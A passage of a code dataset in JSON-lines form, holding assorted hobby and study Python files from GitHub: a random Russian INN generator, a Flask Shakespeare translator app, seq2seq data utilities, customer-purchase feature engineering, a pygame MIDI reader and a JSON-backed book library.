config.dp.resolution[1]\nconfig.student.output_size = config.dp.num_classes\nconfig.student.activation = nn.ReLU()\nconfig.student.output_activation= nn.LogSoftmax(dim=1)\n","repo_name":"ayushkamat/eecs_229a_final_project","sub_path":"configs/modify_mnist.py","file_name":"modify_mnist.py","file_ext":"py","file_size_in_byte":1454,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"18500630174","text":"import random\n\n\ndef calculate_key(_, __):\n array_for_key_computation = [3, 7, 2, 4, 10, 3, 5, 9, 4, 6, 8]\n key_summa = 0\n for ___ in __:\n key_summa += int(___) * array_for_key_computation[_]\n _ += 1\n ____ = key_summa - (key_summa // 11) * 11\n if ____ < 10:\n __.append(str(____))\n else:\n __.append(str(____ - (____ // 10) * 10))\n return __\n\n\ndef create_inn_without_keys(_):\n __ = []\n for i in range(0, _):\n __.append(str(random.randint(0, 9)))\n return __\n\n\ndef create_russian_random_inn(characters=10):\n \"\"\"\n :param characters: 10 - organization, 12 - IP\n :return: valid inn\n \"\"\"\n if characters == 10:\n valid_inn = calculate_key(2, create_inn_without_keys(9))\n else:\n valid_inn = calculate_key(0, calculate_key(1, create_inn_without_keys(10)))\n return ''.join(valid_inn)\n","repo_name":"GrigoriiLikhachev/createJsonSchema","sub_path":"create_russian_random_inn.py","file_name":"create_russian_random_inn.py","file_ext":"py","file_size_in_byte":870,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"32928275652","text":"def primeNumber(n):\n \n if n>0:\n count = 0\n j=2\n while j<=n:\n if n%j == 0:\n count+=1\n j+=1\n if count==1:\n return True\n elif n<0:\n count = 0\n j=-2\n while j>=n:\n if n%j == 0:\n count+=1\n j-=1\n if count==1:\n return True\n\n\n return False\n\ndef generateDude(num1,num2):\n li = []\n for i in range(num1,num2):\n if primeNumber(i):\n li.append(i)\n return abs(min(li)+max(li))\n\n\n\ndef main():\n num1, num2 = map(int, input().split(\" \"))\n if num1 < num2:\n otp = generateDude(num1,num2)\n print(otp)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"omkumar01/placement-practice-material","sub_path":"problem_otp.py","file_name":"problem_otp.py","file_ext":"py","file_size_in_byte":729,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"32630815506","text":"'''test Flask'''\n\nfrom flask import Flask, render_template, redirect, url_for\nfrom flask_bootstrap import Bootstrap\nfrom flask_wtf import FlaskForm\nfrom wtforms import StringField, SubmitField\nfrom wtforms.validators import DataRequired\n\nfrom app import translate, generate\n\napp = Flask(__name__)\n\napp.config['SECRET_KEY'] = 'completely_unique_secret_keyZfAb'\n\nBootstrap(app)\n\nclass TranslateForm(FlaskForm):\n name = StringField('Insert your Shakespearean English here', validators=[DataRequired()])\n submit = SubmitField('Translate')\n\nclass PromptForm(FlaskForm):\n name = StringField('Insert your Shakespearean prompt here', validators=[DataRequired()])\n submit = SubmitField('Generate text')\n\n@app.route('/')\ndef index():\n return render_template('index.html')\n\n@app.route('/translator', methods=['GET', 'POST'])\ndef translator():\n translate_form = TranslateForm()\n\n original = ''\n translation = ''\n\n if translate_form.validate_on_submit():\n original = translate_form.name.data\n translation = translate(original)\n\n return render_template(\n 'translator.html',\n form=translate_form,\n original=original,\n translation=translation,\n )\n\n@app.route('/generator', methods=['GET', 'POST'])\ndef generator():\n prompt_form = PromptForm()\n\n prompt = ''\n generation = ''\n\n if prompt_form.validate_on_submit():\n prompt = prompt_form.name.data\n generation = generate(prompt)\n\n return render_template(\n 'generator.html',\n form=prompt_form,\n prompt=prompt,\n generation=generation\n )\n\n","repo_name":"landonwork/hackusu","sub_path":"index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":1610,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"4947966320","text":"\n\"\"\"Utilities for downloading data , tokenizing, vocabularies.\"\"\"\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport gzip\nimport os\nimport re\nimport tarfile\n\nfrom six.moves import urllib\n\nfrom tensorflow.python.platform import gfile\n\n# Special vocabulary symbols - we always put them at the start.\n_PAD = b\"_PAD\"\n_GO = b\"_GO\"\n_EOS = b\"_EOS\"\n_UNK = b\"_UNK\"\n_START_VOCAB = [_PAD, _GO, _EOS, _UNK]\n\nPAD_ID = 0\nGO_ID = 1\nEOS_ID = 2\nUNK_ID = 3\n\n# Regular expressions used to tokenize.\n_CHAR_SPLIT = re.compile(b\"([.,!?\\\"':;)(])\")\n_DIGIT_RE = re.compile(br\"\\d\")\n\n\ndef maybe_download(directory, filename, url):\n \"\"\"Download filename from url unless it's already in directory.\"\"\"\n if not os.path.exists(directory):\n print(\"Creating directory %s\" % directory)\n os.mkdir(directory)\n filepath = os.path.join(directory, filename)\n if not os.path.exists(filepath):\n print(\"Downloading %s to %s\" % (url, filepath))\n filepath, _ = urllib.request.urlretrieve(url, filepath)\n statinfo = os.stat(filepath)\n print(\"Succesfully downloaded\", filename, statinfo.st_size, \"bytes\")\n return filepath\n\n\ndef gunzip_file(gz_path, new_path):\n \"\"\"Unzips from gz_path into new_path.\"\"\"\n print(\"Unpacking %s to %s\" % (gz_path, new_path))\n with gzip.open(gz_path, \"rb\") as gz_file:\n with open(new_path, \"wb\") as new_file:\n for line in gz_file:\n new_file.write(line)\n\n\ndef get_rev_enhn_train_set(directory):\n \"\"\"Check whether training files exist\"\"\"\n print(directory)\n train_path = os.path.join(directory, \"train\")\n if not (gfile.Exists(train_path +\".hn\") and gfile.Exists(train_path +\".en\")):\n raise ValueError(\"Training files %s not found.\", train_path)\n return train_path\n\n\ndef get_rev_enhn_dev_set(directory):\n \"\"\"Check whether Development files exist.\"\"\"\n dev_name = \"valid\"\n dev_path = os.path.join(directory, dev_name)\n if not (gfile.Exists(dev_path + \".hn\") and gfile.Exists(dev_path + \".en\")):\n raise ValueError(\"Development files %s not found.\", dev_path)\n return dev_path\n\n\ndef basic_tokenizer(sentence):\n \"\"\"Very basic tokenizer: split the word into a list of tokens.\"\"\"\n words = []\n for space_separated_fragment in sentence.strip().split():\n words.extend(re.split('_', space_separated_fragment))\n list1 = [w for w in words if w]\n return list1\n\n\ndef create_vocabulary(vocabulary_path, data_path, max_vocabulary_size,\n tokenizer=None, normalize_digits=False):\n if not gfile.Exists(vocabulary_path):\n print(\"Creating vocabulary %s from data %s\" % (vocabulary_path, data_path))\n vocab = {}\n with gfile.GFile(data_path, mode=\"rb\") as f:\n counter = 0\n for line in f:\n counter += 1\n if counter % 10000 == 0:\n print(\" processing line %d\" % counter)\n tokens = tokenizer(line) if tokenizer else basic_tokenizer(line)\n for w in tokens:\n word = re.sub(_DIGIT_RE, b\"0\", w) if normalize_digits else w\n if word in vocab:\n vocab[word] += 1\n else:\n vocab[word] = 1\n print (vocab)\n print (\".................\")\n print (vocab.get)\n sorted(vocab, key=vocab.get, reverse=True)\n vocab_list = _START_VOCAB + sorted(vocab, key=vocab.get, reverse=True)\n if len(vocab_list) > max_vocabulary_size:\n vocab_list = vocab_list[:max_vocabulary_size]\n with gfile.GFile(vocabulary_path, mode=\"wb\") as vocab_file:\n for w in vocab_list:\n vocab_file.write(w + b\"\\n\")\n\n\ndef initialize_vocabulary(vocabulary_path):\n if gfile.Exists(vocabulary_path):\n rev_vocab = []\n with gfile.GFile(vocabulary_path, mode=\"rb\") as f:\n rev_vocab.extend(f.readlines())\n rev_vocab = [line.strip() for line in rev_vocab]\n vocab = dict([(x, y) for (y, x) in enumerate(rev_vocab)])\n return vocab, rev_vocab\n else:\n raise ValueError(\"Vocabulary file %s not found.\", vocabulary_path)\n\n\ndef word_to_token_ids(word, vocabulary,\n tokenizer=None, normalize_digits=False):\n \n if tokenizer:\n chars = tokenizer(word)\n else:\n chars = basic_tokenizer(word)\n if not normalize_digits:\n return [vocabulary.get(w, UNK_ID) for w in chars]\n # Normalize digits by 0 before looking chars up in the vocabulary.\n return [vocabulary.get(re.sub(_DIGIT_RE, b\"0\", w), UNK_ID) for w in chars]\n\n\ndef data_to_token_ids(data_path, target_path, vocabulary_path,\n tokenizer=None, normalize_digits=False):\n if not gfile.Exists(target_path):\n print(\"Tokenizing data in %s\" % data_path)\n vocab, _ = initialize_vocabulary(vocabulary_path)\n with gfile.GFile(data_path, mode=\"rb\") as data_file:\n with gfile.GFile(target_path, mode=\"w\") as tokens_file:\n counter = 0\n for line in data_file:\n counter += 1\n if counter % 10000 == 0:\n print(\" tokenizing line %d\" % counter)\n token_ids = word_to_token_ids(line, vocab, tokenizer,\n normalize_digits)\n tokens_file.write(\" \".join([str(tok) for tok in token_ids]) + \"\\n\")\n\n\ndef prepare_rev_data(data_dir, en_vocabulary_size, hn_vocabulary_size, tokenizer=None):\n \n # Get REV data to the specified directory.\n train_path = get_rev_enhn_train_set(data_dir)\n dev_path = get_rev_enhn_dev_set(data_dir)\n\n # Create vocabularies of the appropriate sizes.\n hn_vocab_path = os.path.join(data_dir, \"vocab%d.hn\" % hn_vocabulary_size)\n en_vocab_path = os.path.join(data_dir, \"vocab%d.en\" % en_vocabulary_size)\n create_vocabulary(hn_vocab_path, train_path + \".hn\", hn_vocabulary_size, tokenizer)\n create_vocabulary(en_vocab_path, train_path + \".en\", en_vocabulary_size, tokenizer)\n\n # Create token ids for the training data.\n hn_train_ids_path = train_path + (\".ids%d.hn\" % hn_vocabulary_size)\n en_train_ids_path = train_path + (\".ids%d.en\" % en_vocabulary_size)\n data_to_token_ids(train_path + \".hn\", hn_train_ids_path, hn_vocab_path, tokenizer)\n data_to_token_ids(train_path + \".en\", en_train_ids_path, en_vocab_path, tokenizer)\n\n # Create token ids for the development data.\n hn_dev_ids_path = dev_path + (\".ids%d.hn\" % hn_vocabulary_size)\n en_dev_ids_path = dev_path + (\".ids%d.en\" % en_vocabulary_size)\n data_to_token_ids(dev_path + \".hn\", hn_dev_ids_path, hn_vocab_path, tokenizer)\n data_to_token_ids(dev_path + \".en\", en_dev_ids_path, en_vocab_path, tokenizer)\n\n return (en_train_ids_path, hn_train_ids_path,\n en_dev_ids_path, hn_dev_ids_path,\n en_vocab_path, hn_vocab_path)\n","repo_name":"shikha369/Seq2SeqTransliteration","sub_path":"base code/data_utils.py","file_name":"data_utils.py","file_ext":"py","file_size_in_byte":6552,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"42857552592","text":"def get_appliance_disk_information(\n self,\n ne_id: str,\n) -> dict:\n \"\"\"Get disk information from appliance\n\n .. list-table::\n :header-rows: 1\n\n * - Swagger Section\n - Method\n - Endpoint\n * - disks\n - GET\n - /configReportDisk/{neId}\n\n :param ne_id: Appliance id in the format of integer.NE e.g. ``3.NE``\n :type ne_id: str\n :return: Returns dictionary of disk information \\n\n * keyword **disks** (`dict`): Dictionary of disks in Edge\n Connect appliance. Disks are identified by numeric strings,\n e.g. ``\"0\"``\n * keyword **controller** (`dict`): Dictionary of controller\n information\n * keyword **diskImage** (`str`): Filename of disk image\n :rtype: dict\n \"\"\"\n return self._get(\"/configReportDisk/{}\".format(ne_id))\n","repo_name":"SPOpenSource/edgeconnect-python","sub_path":"pyedgeconnect/orch/_disks.py","file_name":"_disks.py","file_ext":"py","file_size_in_byte":848,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"69"}
+{"seq_id":"42979942211","text":"import os\nimport datetime\nfrom dateutil.relativedelta import relativedelta\n\nimport pandas as pd\nimport numpy as np\nfrom sklearn.preprocessing import StandardScaler \nfrom sklearn.metrics import roc_auc_score\n\n# Thresholds \nTOTAL_THRES = 270\nMIDDLE_THRES = 210\nSTATUS_THRES = 20\n\n# Required directory paths\ndata_dir = '/opt/ml/code/input/train.csv'\nmodel_dir = '/opt/ml/model'\n\n\ndef generate_label_status(df_original, target_date, status_thres=STATUS_THRES):\n \"\"\" Labeling based on whether customer purchase at target date(month)\n This label dosen't care about whether he will buy more than $300(TOTAL_THRES)\n\n Args:\n df_original (pd.DataFrame): monthly frame\n target_date (str): date to apply prediction\n status_thres (int): threshold to consider as 'purchased'\n \n Returns:\n purchase status label (0/1) on target date\n \"\"\"\n\n df = df_original.copy()\n\n label_values = df[target_date]\n label = (label_values > status_thres).astype(int)\n label = label.sort_index().to_frame(name='status_label').reset_index()\n\n return label\n\n\ndef generate_label_total(df_original, middle_thres=MIDDLE_THRES, total_thres=TOTAL_THRES, status_thres=STATUS_THRES):\n \"\"\" Calculate consumption expectations of each customer based on average consumption history\n\n https://stats.stackexchange.com/questions/135061/best-method-for-short-time-series\n Averaging is one of the strongest method. ㅇ _ㅇ\n\n Args:\n df_original (pd.DataFrame): monthly frame\n middle_thres (int): if 'middle_thres < expectation < total_thres' is true, apply 0.5\n total_thres (int): if 'expectation > total_thres' is true, apply 1.0\n status_thres (int): Averaging only above status_thres\n \n Returns:\n purchase total label (0/0.5/1) on target date\n \"\"\"\n\n df = df_original.copy()\n label = df[df > status_thres].mean(axis=1)\n label[label < middle_thres] = 0\n label[(label > middle_thres) & (label < total_thres)] = 0.5\n label[label >= total_thres] = 1\n label = label.sort_index().to_frame(name='total_label').reset_index()\n\n return label\n\n\ndef generate_monthly_frame(df_original, categories):\n \"\"\" Generate monthly purchase data calculated for each customer\n\n Args:\n df_original (pd.DataFrame): DataFrame dropped with unnecessary columns\n categories (list[str]): numerical categories to be aggregated\n\n Returns:\n monthly frame\n \n ex)\n ym 2009-12 2010-01 ... 2011-10 2011-11 \n customer_id \n 12346 187.2750 -22.275 ... 0.000 0.0000 \n 12349 -39.8475 0.000 ... 1763.058 330.0000 \n ... ... ... ... ... ... \n 18286 763.8675 0.000 ... 0.000 0.0000 \n 18287 -8.4150 0.000 ... 0.000 1768.1565 \n\n \"\"\"\n\n df = df_original.copy()\n\n # -- groupby / pivot_table\n df = df.groupby(['customer_id', 'ym'])[categories].sum().reset_index()\n monthly_frame = pd.pivot_table(data=df,\n values=categories,\n index='customer_id',\n columns='ym',\n fill_value=0)\n\n return monthly_frame\n\n\ndef time_series_processing(df_original, categories, train=True):\n \"\"\" Generate features that reflect the characteristics of time series data.\n In this function, SUM and SKEW will be applied to each specified time period.\n\n - Seasonality(Continuity): The person who bought recently will buy again\n 1. Last 10 months | 2. Last 7 months | 3. Last 4 months \n\n - Cyclicity(Periodicity): People buy things regularly\n 1. two-months interval | 2. three-months interval | 3. annually(1 year interval)\n\n - Weak-Cyclicity: The person who bought last year will buy again at near month\n - Around last year's target month\n\n Args:\n df_original (pd.DataFrame): monthly frame\n categories (list[str]): aggregated categories\n train (bool): True if df_original is train data\n\n Returns:\n Specialized time series data\n \"\"\"\n \n df = df_original.copy()\n \n # -- Declare period list that reflect each attribute\n if train:\n target_date = '2011-11'\n\n # -- seasonality\n seasons1 = ['2011-01', '2011-02', '2011-03', '2011-04', '2011-05', '2011-06', '2011-07', '2011-08', '2011-09', '2011-10']\n seasons2 = ['2011-04', '2011-05', '2011-06', '2011-07', '2011-08', '2011-09', '2011-10']\n seasons3 = ['2011-07', '2011-08', '2011-09', '2011-10']\n\n # -- cyclicity\n cycle1 = ['2011-01', '2011-03', '2011-05', '2011-07', '2011-09']\n cycle2 = ['2010-08', '2010-11', '2011-02', '2011-05', '2011-08']\n cycle3 = ['2010-11']\n\n # -- weak-periodicity\n weak_cycle = ['2009-12', '2010-10', '2010-11', '2010-12']\n\n else: \n target_date = '2011-12'\n \n # -- seasonality\n seasons1 = ['2011-02', '2011-03', '2011-04', '2011-05', '2011-06', '2011-07', '2011-08', '2011-09', '2011-10', '2011-11']\n seasons2 = ['2011-05', '2011-06', '2011-07', '2011-08', '2011-09', '2011-10', '2011-11']\n seasons3 = ['2011-09', '2011-10', '2011-11']\n\n # -- cyclicity\n cycle1 = ['2011-02', '2011-04', '2011-06', '2011-08', '2011-10']\n cycle2 = ['2010-09', '2010-12', '2011-03', '2011-06', '2011-09']\n cycle3 = ['2010-12']\n\n # -- weak-periodicity\n weak_cycle = ['2010-01', '2010-11', '2010-12', '2011-01']\n\n df_ret = pd.DataFrame()\n time_list_bundle = [seasons1, seasons2, seasons3, cycle1, cycle2, cycle3, weak_cycle]\n attribute_names = ['seasonality1', 'seasonality2', 'seasonality3', 'cyclicity1', 'cyclicity2', 'cyclicity3', 'weak_cyclicity']\n\n # -- For each category, apply agg independently\n for category in categories:\n categoric_df = pd.DataFrame()\n\n for time_list, attribute_name in zip(time_list_bundle, attribute_names):\n now_df = df[category].loc[:, time_list]\n\n # -- Aggregating (sum, skew)\n attribute_sum = now_df.sum(axis=1)\n attribute_skew = now_df.skew(axis=1)\n\n categoric_df[f\"{category}_{attribute_name}_sum\"] = attribute_sum\n categoric_df[f\"{category}_{attribute_name}_skew\"] = attribute_skew\n\n df_ret = pd.concat([df_ret, categoric_df], axis=1)\n\n return df_ret\n\n\ndef calculate_date_diff(df_original, start_date, target_date):\n \"\"\" Generate the gap between first purchase date and last purchase date as feature.\n Refund data is NOT considered as purchase.\n\n Args:\n df_original (pd.DataFrame): monthly frame\n start_date (str): start date(2009-12 or 2010-01)\n target_date (str): target date\n\n Returns:\n date diff\n default: (last purchase date) - (first purchase date)\n If there is only one purchase date, (target date) - (first purchase date)\n \"\"\"\n\n df = df_original.copy()\n\n # -- Convert each data to pd.Timestamp\n start_date = pd.to_datetime(start_date)\n target_date = pd.to_datetime(target_date)\n \n # -- Calculate date diff for each row(customer)\n dt_diff = []\n for customer_id, datas in df.iterrows():\n start = start_date\n end = start_date\n \n for date, value in datas.items():\n if value > 0 and start == start_date:\n start = pd.to_datetime(date)\n if value > 0:\n end = pd.to_datetime(date)\n \n # -- When only one purchase data exist\n if start == end:\n end = pd.to_datetime(target_date) \n dt_diff.append(int((end - start).total_seconds()))\n\n dt_diff = np.array(dt_diff).reshape(-1, 1)\n\n # -- Normalize\n scaler = StandardScaler()\n dt_diff = scaler.fit_transform(dt_diff)\n\n return dt_diff\n\n\ndef apply_agg_to_feature(df_original, categories, start_date=None, target_date=None):\n \"\"\" Apply aggregate function to monthly data.\n 1. Generate monthly cumsum columns\n 2. Apply aggregation(skew) to original monthly data and of cumsum data. \n 3. (optional) Call 'calculate_date_diff' method\n\n Args:\n df_original (pd.DataFrame): monthly frame\n categories: aggregated categories\n\n (optional, when want to add 'date_diff' feature)\n start_date (str): start date(2009-12 or 2010-01)\n target_date (str): target date\n\n Returns:\n aggregated features\n \"\"\"\n\n df = df_original.copy()\n\n # -- Apply cumsum/skew\n df_ret = df.copy()\n for category in categories:\n df_skew = df[category].skew(axis=1).rename(f'{category}_skew')\n df_cumsum = df[category].cumsum(axis=1)\n df_cumsum.columns = [f\"cum_{category}_{x}\" for x in df_cumsum.columns]\n cumsum_skew = df_cumsum.skew(axis=1).rename(f'{category}_cumsum_skew')\n\n df_ret = pd.concat([df_ret, df_skew, df_cumsum, cumsum_skew], axis=1)\n df_ret = df_ret.rename(columns={'skew': f'{category}_skew',\n 'cumsum': f'{category}_cumsum',\n 'cumsum_skew': f'{category}_cumsum_skew'})\n\n # -- If start_date and target_date exists, generate date_diff feature additionally\n if start_date and target_date:\n date_diff = calculate_date_diff(df['total'], start_date=start_date, target_date=target_date)\n df_ret['date_diff'] = date_diff\n\n return df_ret\n\n\ndef convert_multi_index_to_single(df_original):\n \"\"\" Convert multi-index columns to single index.\n\n Args:\n df_original (pd.DataFrame): monthly frame\n\n Returns:\n monthly frame with single-index columns.\n ex) ('total', '2011-10') => 'total_2011-10'\n \"\"\"\n\n df = df_original.copy()\n\n new_columns = []\n for column in df.columns:\n new_column = column\n\n # -- If multi-index\n if isinstance(column, tuple):\n new_column = f\"{column[0]}_{column[1]}\"\n new_columns.append(new_column)\n df.columns = new_columns\n\n return df\n\n\ndef feature_engineering(df_original, target_date):\n \"\"\" Date feature engineering\n 1. Drop unnecessary columns(features)\n 2. Make monthly frame\n 3. Feature extracting\n 4. Imputing\n \n Args:\n df_original (pd.DataFrame): raw frame\n target_date (str): target date (i.e., '2011-12')\n\n Returns:\n preprocessed data(Split as train and test)\n train label(status, total)\n \"\"\"\n\n df = df_original.copy()\n\n # -- Basic preprocessing\n df.order_date = pd.to_datetime(df.order_date)\n df['ym'] = pd.to_datetime(df['order_date']).dt.strftime('%Y-%m')\n df.drop(['order_id', 'product_id', 'description', 'price', 'country'], axis=1, inplace=True)\n\n # -- Calculate period of train and test and apply it.\n d = datetime.datetime.strptime(target_date, \"%Y-%m\")\n prev_date = (d - relativedelta(months=1)).strftime(\"%Y-%m\")\n init_date = df.order_date.min().strftime(\"%Y-%m\")\n\n train = df[df['ym'] < prev_date]\n test = df[(df['ym'] < target_date) & (df['ym'] > init_date)]\n\n # -- Generate monthly frame and train label\n categories = ['total', 'quantity']\n monthly_frame = generate_monthly_frame(df, categories)['total']\n train_data = generate_monthly_frame(train, categories)\n test_data = generate_monthly_frame(test, categories)\n\n status_label = generate_label_status(monthly_frame, prev_date)\n total_label = generate_label_total(monthly_frame)['total_label']\n\n # -- Denoising\n train_data[train_data < STATUS_THRES] = 0\n test_data[test_data < STATUS_THRES] = 0\n\n # -- Feature extracting\n train_ts = time_series_processing(train_data, categories, train=True)\n test_ts = time_series_processing(test_data, categories, train=False)\n \n train_agg = apply_agg_to_feature(train_data, categories, start_date='2009-12', target_date='2011-11')\n test_agg = apply_agg_to_feature(test_data, categories, start_date='2010-01', target_date='2011-12')\n\n X_train = pd.merge(train_ts, train_agg, on=['customer_id'], how='left')\n X_train = pd.merge(X_train, status_label, on=['customer_id'], how='left')\n X_test = pd.merge(test_ts, test_agg, on=['customer_id'], how='left')\n \n # -- For convenience(ignoreable)\n X_test['customer_id'] = X_test.index\n X_test = X_test[[X_test.columns.values[-1]] + list(X_test.columns.values[:-1])]\n X_test.reset_index(drop=True).sort_values(by='customer_id')\n\n # -- Imputing(for test data)\n checker = X_train['customer_id'].isin(X_test.index)\n imputed = X_train[~checker].drop(columns=['status_label'])\n test_cols = {x: y for x, y in zip(X_train.columns, X_test.columns)}\n X_test = X_test.append(imputed.rename(columns=test_cols)).sort_values(by='customer_id')\n\n # -- Detect multi-index and convert them to single\n X_train = convert_multi_index_to_single(X_train)\n X_test = convert_multi_index_to_single(X_test)\n\n return X_train.drop(columns=['customer_id', 'status_label']), \\\n X_test.drop(columns=['customer_id']), \\\n X_train['status_label'], \\\n total_label\n\n\nif __name__ == '__main__':\n print('data_dir', data_dir)\n","repo_name":"bcaitech1/p2-tab-olenmg","sub_path":"features.py","file_name":"features.py","file_ext":"py","file_size_in_byte":13312,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"9136328477","text":"class Solution:\n def twoSum(self, nums: List[int], target: int) -> List[int]: \n mem = {}\n \n for key, value in enumerate(nums):\n diff = target - value\n \n if diff in mem:\n return [mem[diff], key]\n else:\n mem[value] = key\n \n return []\n","repo_name":"Amyth07/Leetcode","sub_path":"1. Two Sum.py","file_name":"1. Two Sum.py","file_ext":"py","file_size_in_byte":351,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"5959718242","text":"import sys\nimport os\n\nimport pygame\nimport pygame.midi\nfrom pygame.locals import *\n\npygame.init()\npygame.fastevent.init()\nevent_get = pygame.fastevent.get\nevent_post = pygame.fastevent.post\n\npygame.midi.init()\n\ninput_id = pygame.midi.get_default_input_id()\n\nprint (\"using input_id :%s:\" % input_id)\ni = pygame.midi.Input( input_id )\n\npygame.display.set_mode((1,1))\n\n\n\ngoing = True\nwhile going:\n events = event_get()\n for e in events:\n if e.type in [QUIT]:\n going = False\n if e.type in [KEYDOWN]:\n going = False\n if e.type in [pygame.midi.MIDIIN]:\n print (e)\n\n if i.poll():\n midi_events = i.read(10)\n # convert them into pygame events.\n midi_evs = pygame.midi.midis2events(midi_events, i.device_id)\n for m_e in midi_evs:\n event_post( m_e )\ndel i\npygame.midi.quit()\n","repo_name":"hgijeon/the_PLAY","sub_path":"test_midi.py","file_name":"test_midi.py","file_ext":"py","file_size_in_byte":866,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"31514866310","text":"import os \nfrom PIL import Image\nfrom PIL import ImageDraw \nfrom PIL import ImageFont\n\n\ndef create_card(name):\n\tcard = Image.new('RGBA', (360, 288), 'white')\n\tflower = Image.open('zophie.png')\n\tcard.paste(flower, (10, 40))\n\tcut_guide = Image.new('RGBA', (364, 292), 'black')\n\tcut_guide.paste(card, (2, 2))\n\n\tdraw_obj = ImageDraw.Draw(cut_guide)\n\tfonts_folder = 'user/share/fonts/TTF'\n\tcustom_font = ImageFont.truetype(os.path.join(fonts_folder, 'ariel.ttf'), 72)\n\tdraw_obj.text((120, 100), name, fill='blue', font=custom_font)\n\tcut_guide.save('{}-invite.png'.format(name))\n\n\nwith open('guests.txt') as f:\n\tguests = f.readlines()\nprint(guests)\n\nfor guest in guests:\n\tcreate_card(guest)\n\nprint('All invations cards have been sent.')","repo_name":"francisliujia/codelife","sub_path":"python_code/textbooks/automate_the_boring_stuff_with_python/image_cards.py","file_name":"image_cards.py","file_ext":"py","file_size_in_byte":730,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"15292751245","text":"import json\nfrom functools import total_ordering\nfrom time import process_time_ns\n\n@total_ordering\nclass Livros:\n def __init__(self, nome, autor, data_publicacao):\n self._nome = nome\n self._autor = autor\n self._data_publicacao = data_publicacao\n \n def __str__(self):\n return f'Nome do livro: {self._nome} - Autor: {self._autor} - Data publicação: {self._data_publicacao}'\n \n # \n def __eq__(self, outro_livro):\n if isinstance(outro_livro, Livros):\n return ((self._nome == outro_livro._nome) and \n (self._autor == outro_livro._autor) and \n (self._data_publicacao == outro_livro._data_publicacao))\n \n return False\n \n def __lt__(self, outro_livro):\n return self._data_publicacao > outro_livro._data_publicacao\n \n @property\n def nome(self):\n return self._nome\n \n \nclass Biblioteca():\n def pegarLivros(self):\n livros = []\n \n # with open('livros.json', \"r\") as arquivo:\n # for linha in arquivo:\n # linha = linha.strip()\n # livros_montagem = linha.split(' - ')\n # if [0, 1, 2] in livros_montagem: \n # book = Livros(livros_montagem[0], livros_montagem[1], livros_montagem[2])\n # livros.append(book)\n # else:\n # print(\"erro\")\n \n with open(\"livros.json\", \"r+\", encoding=\"utf-8\") as dados:\n texto_json = json.load(dados)\n \n for data in texto_json:\n book = Livros(data['Nome'], data['Autor'], data['Data de publicação'])\n livros.append(book)\n \n return livros\n \n def listarLivros(self):\n lista_livros = self.pegarLivros()\n print(\"\\nListando os Livros\\n\")\n for livro in sorted(lista_livros):\n print(livro)\n \n def adicionarLivros(self):\n print(\"Bem vindo a Biblioteca pessoal, digite o livro que você quer cadastrar: \")\n nome = \"\"\n autor = \"\"\n data_de_publicacao = \"\"\n while(nome == \"\" or autor == \"\" or data_de_publicacao == \"\"):\n nome = input(\"Digite o nome do seu livro: \")\n autor = input(\"Digite o autor do seu livro: \")\n data_de_publicacao = input(\"Digite a data de publicação do seu livro: \")\n \n nome = nome.title().strip()\n autor = autor.title().strip()\n data_de_publicacao = data_de_publicacao.strip()\n \n \n list = []\n with open(\"livros.json\", \"r+\", encoding=\"utf-8\") as dados:\n texto_json = json.load(dados)\n \n for line in texto_json:\n list.append(line)\n \n \n with open('livros.json', \"w\", encoding=\"utf-8\") as arquivo:\n livro_dict = {\"Nome\": nome, \"Autor\": autor, \"Data de publicação\": data_de_publicacao}\n list.append(livro_dict)\n text_json = json.dumps(list)\n arquivo.write(text_json)\n \n print(\"\\nLivro adicionado com sucesso :)\")\n \n def removerLivros(self):\n livro_remove_nome = input(\"Digite o nome do livro que você quer remover: \")\n livro_remove_autor = input(\"Digite o autor do livro que você quer remover: \")\n livro_remove_data = input(\"Digite a data de publicação do livro que você quer remover: \")\n \n livro_remove_nome = livro_remove_nome.title().strip()\n livro_remove_autor = livro_remove_autor.title().strip()\n livro_remove_data = livro_remove_data.title().strip()\n \n book = Livros(livro_remove_nome, livro_remove_autor, livro_remove_data)\n \n lista_livros = self.pegarLivros()\n cont = 0\n autorizado = False\n for livro in lista_livros:\n if (book == livro):\n lista_livros.pop(cont)\n self.removeLinha(cont)\n autorizado = True\n \n \n cont += 1\n\n if (not autorizado):\n pergunta = input(\"Livro não encontrado, deseja fazer a operação de novo? ('SIM') ou ('Não')\")\n pergunta = pergunta.strip().title()\n if (pergunta != \"Não\" and pergunta != \"Nao\"):\n self.removerLivros()\n\n print(\"\\nOperação de remoção completa :)\")\n \n def removeLinha(self, indice):\n # with open('livros.txt', \"r\") as arquivo:\n # livroLinhas = arquivo.readlines()\n \n # livroLinhas.pop(indice)\n \n # with open(\"livros.txt\", \"w\") as f:\n # for line in livroLinhas:\n # f.write(line)\n \n list = []\n with open(\"livros.json\", \"r+\", encoding=\"utf-8\") as dados:\n texto_json = json.load(dados)\n \n for line in texto_json:\n if line != texto_json[indice]:\n list.append(line)\n \n with open('livros.json', \"w\", encoding=\"utf-8\") as arquivo:\n text_json = json.dumps(list)\n arquivo.write(text_json)\n \n \n\n","repo_name":"Kawhan/aprendizadoISYSTEMS","sub_path":"backend/treinamentoPython/cursoPython/projetoBiblioteca/livrosClass/livrosCompletJSON/jsonlibrary.py","file_name":"jsonlibrary.py","file_ext":"py","file_size_in_byte":5147,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
